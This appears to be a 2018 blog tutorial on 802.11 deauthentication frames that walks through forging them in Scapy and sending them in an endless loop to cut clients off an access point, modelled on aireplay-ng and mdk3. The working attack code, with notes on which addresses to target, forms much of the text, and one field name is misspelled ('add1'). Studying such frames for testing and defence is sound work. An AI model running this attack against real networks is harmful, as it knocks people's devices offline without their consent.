Forge and Transmit Deauthentication / Dissociation frames in Scapy

by vault . 05 June 2018

Forge and Transmit Deauthentication / Dissociation frames in Scapy

In this tutorial, we are going to get through the body of 802.11 deauthentication frame. Our ultimate goal will be to terminate a connection between two stations, communicating with each other for data transmission. Note that sometimes deauthentication frame is also referred to as dissociation frame. But they are not the same tough they share the same structure and same fields.

If you'd ever get a chance to use aireplay-ng or mdk3, you might've wondered how you could be able to dissociate a client from it's AP. That's where dissociation is performed. Both of these are counted as management frames which are not supposed to be authenticated. Hence, the receiver doesn't know that who is the real originator of the received frame.

Deauth Frame

Deauth frames are used to terminate a session between two stations. It's not important who is originating the packet but who is it intended for. A station can still make a connection after the dissociation has been performed. As soon as the packet reaches its destination, the receiver cut off itself from the sender. Some of the important Dot11 Mac headers for a deauth frame.

  • type: 0, specifies it's a management frame | In scapy it will be 0L
  • subtype: 12 (0x0c)
  • Destination: Station, packet destined for.
  • Source: Source station.

Graphical Plot of a deauth frame:

deauth header

The deauth frame comprised of three fields:

  1. Reason: A positive integer which specifes the reason.
  2. Vendor Specifc Information
  3. 802.11w

Deauth in Scapy

Now, we will transmit some of the deauthentication frame over the air using scapy. First of all, surely we would need scapy. So, install it:

sudo pip install scapy
# OR (Python 3)
sudo pip3 install scapy

Now, launch the Python interactive shell by giving the python directive:

$ python

Now getting on to the point, we have to form a deauthentication packet first. Import the required layers from scapy and form a deauth packet.

>>> from scapy.layers.dot11 import RadioTap, Dot11, Dot11Deauth

Forging the packet would go like...

>>> pkt = RadioTap() / Dot11(add1="FF:FF:FF:FF:FF:FF", addr2="FF:FF:FF:FF:FF:FF", addr3="FF:FF:FF:FF:FF:FF") / Dot11Deauth(reason=2)

Note the fields:

  • addr1: BSSID of the Client you want to terminate connection with.
  • addr2: BSSID of the Access Point (AP)
  • addr3: Same as addr2

Now, to send the packet:

>>> while True:
...    sendp(pkt, iface="wlan0mon", verbose=False)

Reason Codes :

Deauth packet contains a field reason which explains why the connection is being terminated. Here are some of the few common used reason codes:

1Unspecified Reason
2Previous authentication is no longer valid
3STA is leaving or has left
4Dissociated due to inactivity
5AP is unable to cope with all associated STAs.
6Class 2 Frame received from nonauthenticated STA
7Class 3 Frame received from nonassociated STA
8Because sending STA is leaving
9STA request is not authenticated with responding STA
10Because Information in the Power Capability element is unacceptable.

So, that's how you can get started with your first script like aireplay-ng. Whatever, here's a captured deauthentication packet in scapy:


From the above highighted field, it is clear that the packet was sent from c8:3a:35:55:0c:f0 to broadcast address which means every other station the sender is connected to. In comparison with this, it would be better if the bssid of target station is directly specified. So, the target must know that this packet is orignated especially for him and he must have to accept it.


So, we saw the structure of 802.11 deauthentication packet and now you be able to forge your own packet and build something like aireplay or mdk3. Both of these are very powerful tools. I've coded a small script for you to test and read a little more deeper yourself. Here's the link on github: maximMole/ The script does the pretty nice work of explaining and collecting nearby wireless networks and forge deauth packets.